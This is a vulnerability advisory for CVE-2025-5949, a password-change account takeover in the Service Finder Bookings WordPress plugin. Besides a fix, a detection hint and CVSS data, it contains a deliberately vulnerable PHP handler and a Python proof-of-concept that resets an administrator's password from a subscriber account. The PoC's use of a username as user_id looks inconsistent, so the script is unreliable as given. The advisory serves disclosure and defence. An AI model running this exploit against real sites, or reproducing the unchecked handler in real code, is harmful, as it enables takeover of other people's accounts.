Security Vulnerability Report
CVE-2025-5949 CVSS 8.8 HIGH

CVE-2025-5949

Published: 2025-11-01 05:16:03
Last Modified: 2026-04-15 00:35:42

Description

The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's identity prior to processing a password change request. This makes it possible for authenticated attackers with subscriber access or higher to reset other users' passwords, including those of admins.
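The description pins the flaw to one missing step: the handler never checks that the account whose password is being changed belongs to the caller (the CWE-639 pattern, where a user-controlled key selects the object acted on). The PHP below is an added illustration of that bug class beside its fix in a WordPress AJAX handler. It is not the Service Finder Bookings plugin's code; the action name `sf_update_account` is taken from the PoC on this page, and the function names, nonce name and `current_password` field are assumptions.

```php
<?php
// Added illustration, not the plugin's code. The AJAX action name comes from
// the PoC on this page; function names, the nonce name and the
// "current_password" field are hypothetical.

// VULNERABLE PATTERN: the account to update is taken from the request and is
// never compared with the logged-in user, so any authenticated subscriber can
// name another account (including an administrator) and set its password.
function sf_update_account_vulnerable() {
    $user_id      = absint( $_POST['user_id'] ?? 0 );
    $new_password = (string) ( $_POST['new_password'] ?? '' );
    $confirm      = (string) ( $_POST['confirm_password'] ?? '' );

    if ( $new_password === '' || $new_password !== $confirm ) {
        wp_send_json_error( 'Passwords do not match.' );
    }

    wp_set_password( $new_password, $user_id ); // no ownership check at all
    wp_send_json_success( 'Password updated.' );
}

// HARDENED PATTERN: derive the target from the session, honour a client-supplied
// id only behind a capability check, require a nonce against CSRF, and demand
// the current password for self-service changes.
function sf_update_account_hardened() {
    // Only logged-in users reach this hook (wp_ajax_nopriv_ is not registered),
    // but check explicitly so the handler is safe wherever it is wired up.
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'Not logged in.', 401 );
    }

    // CSRF protection: the form must carry a nonce minted for this action.
    check_ajax_referer( 'sf_update_account', 'sf_nonce' );

    $current_user_id = get_current_user_id();
    $requested_id    = absint( $_POST['user_id'] ?? 0 );

    // A missing or non-numeric id means "myself". Any other id is allowed only
    // to callers who already hold edit_user on that account (administrators).
    $user_id = $requested_id > 0 ? $requested_id : $current_user_id;
    if ( $user_id !== $current_user_id && ! current_user_can( 'edit_user', $user_id ) ) {
        wp_send_json_error( 'You may only change your own password.', 403 );
    }

    // Re-authentication: a self-service change needs the current password, so a
    // hijacked session alone cannot lock the real owner out.
    if ( $user_id === $current_user_id ) {
        $user = wp_get_current_user();
        $old  = (string) ( $_POST['current_password'] ?? '' );
        if ( ! wp_check_password( $old, $user->user_pass, $user->ID ) ) {
            wp_send_json_error( 'Current password is incorrect.', 403 );
        }
    }

    $new_password = (string) ( $_POST['new_password'] ?? '' );
    $confirm      = (string) ( $_POST['confirm_password'] ?? '' );
    if ( strlen( $new_password ) < 12 || $new_password !== $confirm ) {
        wp_send_json_error( 'Password too short or confirmation mismatch.' );
    }

    wp_set_password( $new_password, $user_id );
    wp_send_json_success( 'Password updated.' );
}

// Register only the hardened handler, and only for authenticated requests.
add_action( 'wp_ajax_sf_update_account', 'sf_update_account_hardened' );
```

The difference that matters is where the target identity comes from: the hardened handler starts from `get_current_user_id()` and treats the request's `user_id` as a request that must pass `current_user_can( 'edit_user', ... )`, rather than as a fact. For detection on an unpatched site, the corresponding signal is an `admin-ajax.php` POST for this action from a low-privilege session whose `user_id` does not match the session's own user.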

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Service Finder Bookings plugin for WordPress <= 6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-5949 PoC - Service Finder Bookings Plugin Account Takeover
# Target: WordPress site with Service Finder Bookings plugin <= 6.0

TARGET_URL = "https://vulnerable-site.com"
ATTACKER_USERNAME = "attacker"
ATTACKER_PASSWORD = "attacker_password"
TARGET_USERNAME = "admin"  # Target can be any user including admin
NEW_PASSWORD = "Pwned123!"

# One session keeps the WordPress auth cookies across the three requests
session = requests.Session()

# Step 1: Login as low-privilege user
login_url = f"{TARGET_URL}/wp-login.php"
login_data = {
    "log": ATTACKER_USERNAME,
    "pwd": ATTACKER_PASSWORD,
    "wp-submit": "Log In",
}
resp = session.post(login_url, data=login_data)
print(f"Login status: {resp.status_code}")

# Step 2: Exploit password change vulnerability
# The plugin does not properly validate user identity before password change
change_password_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
exploit_data = {
    "action": "sf_update_account",
    "user_id": TARGET_USERNAME,  # Target user ID
    "new_password": NEW_PASSWORD,
    "confirm_password": NEW_PASSWORD,
}
resp = session.post(change_password_url, data=exploit_data)
print(f"Exploit status: {resp.status_code}")
print(f"Response: {resp.text}")

# Step 3: Login with new password
target_login = f"{TARGET_URL}/wp-login.php"
target_data = {
    "log": TARGET_USERNAME,
    "pwd": NEW_PASSWORD,
}
resp = session.post(target_login, data=target_data)
# A logged-in WordPress page carries the "logged-in" body class
print(f"Account takeover: {'Success' if 'logged-in' in resp.text else 'Failed'}")
```

References

https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793
https://www.wordfence.com/threat-intel/vulnerabilities/id/a2874a5f-71f4-4bcd-87e8-a20bb19a5847?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-5949",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-01T05:16:02.763",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's identity prior to processing a password change request. This makes it possible for authenticated attackers with subscriber access or higher to reset other users' passwords, including those of admins."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a2874a5f-71f4-4bcd-87e8-a20bb19a5847?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```